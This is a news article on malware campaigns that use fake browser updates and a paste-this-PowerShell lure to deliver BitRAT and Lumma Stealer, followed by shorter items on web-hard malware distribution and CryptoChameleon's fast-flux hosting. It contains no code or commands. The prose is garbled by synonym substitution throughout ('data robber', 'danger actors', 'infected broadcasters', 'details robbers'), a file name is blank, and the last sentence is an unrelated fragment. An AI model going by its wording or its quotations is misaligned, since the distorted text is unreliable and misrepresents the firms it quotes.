Malware such as BitRAT and Lumma Stealer is delivered by fake browser updates

Fake web browser updates are being utilized to provide remote access trojans (RATs) and data robber malware such as BitRAT and Lumma Stealer (aka LummaC2). "Fake browser updates have been liable for multiple malware diseases, including those of the well-known SocGholish malware," cybersecurity company eSentire stated in a new report. "In April 2024, we marked FakeBat being spread through identical fake update tools."

The attack chain starts when future targets see a booby-trapped website that includes JavaScript code developed to divert users to a bogus browser update page. The diverted web page comes ingrained with a download link to a ZIP archive file ("") that's hosted on Discord and downloaded automatically to the target's machine. It's worth symbolizing that danger actors usually utilize Discord as an attack vector, with current research from Bitdefender discovering more than 50,000 hazardous links spreading malware, phishing campaigns, and spam over the past six months.

Present within the ZIP archive file is another JavaScript file ("Update.js"), which initiates the implementation of PowerShell scripts accountable for recovering other payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG picture files. Also rescued in this way are PowerShell scripts to show perseverance and a . NET-based loader that's mainly utilized for establishing the final-stage malware. eSentire postulated that the loader is probably announced as a "malware delivery service" owing to the fact that the same loader is operated to deploy both BitRAT and Lumma Stealer.

BitRAT is a feature-rich RAT that permits assaulters to gather data, abundance cryptocurrency, download more binaries, and remotely hijack the infected broadcasters. Lumma Stealer, a thing thief malware known for $250 to $1,000 per month since August 2022, shows the capability to grab data from web browsers, crypto wallets, and other sensitive elements. "The fake browser update lure has become common amongst criticizers as a mechanism of access to a machine or network," the business stated, adding it "expresses the operator's capacity to leverage trusted terms to maximize reach and influence."

While such aggression generally leverages drive-by downloads and malvertising methods, ReliaQuest, in a statement issued last week, expressed it found a new variant of the ClearFake campaign that misleads users into copying, pasting, and manually running malicious PowerShell code under the pretext of a browser update. Particularly, the malicious website claims that "something moved wrong while expressing this webpage" and instructs the site guest to install a core certificate to manage the problem by pursuing a sequence of actions, which affects copying obfuscated PowerShell code and executing it in a PowerShell terminal.

"Upon implementation, the PowerShell code serves numerous roles, including removing the DNS cache, showing a note box, downloading further PowerShell code, and installing 'LummaC2' malware," the firm stated. According to data transmitted by the cybersecurity company, Lumma Stealer emerged as one of the most prevalent details robbers in 2023, alongside RedLine and Raccoon.

"The number of LummaC2-obtained logs recorded for a deal raised by 110% from Q3 to Q4 2023," it reported. "LummaC2's growing popularity among competitors is probably due to its increased victory rate, which guides to its effectiveness in successfully penetrating systems and exfiltrating susceptible data without detection." The development arrives as the AhnLab Security Intelligence Center (ASEC) announced components of a recent movement that uses web hards (short for web hard drive) as a line to spread malicious installers for mature games and translated versions of Microsoft Office and finally deploy a type of malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.

Similar attack chains involving websites showing pirated software have directed to the deployment of malware loaders like PrivateLoader and TaskLoader, which are both presented as a pay-per-install (PPI) service for other cybercriminals to deliver their own payloads. It also tracks new results from Silent Push about CryptoChameleon's "almost only operate" of DNSPod[.]com nameservers to support its phishing kit architecture. DNSPod, a region of the Chinese firm Tencent, has a chronology of delivering services for negative bulletproof hosting operators.

"CryptoChameleon uses DNSPod nameservers to grip in fast flux evasion strategies that permit danger actors to fast cycle via big amounts of IPs connected to a single field term," the business stated. "Fast flux permits CryptoChameleon infrastructure to avoid traditional countermeasures and greatly decreases the functional importance of heritage point-in-time IOCs." operating at least seven immediate social media accounts and a CIB network of more than 250 accounts.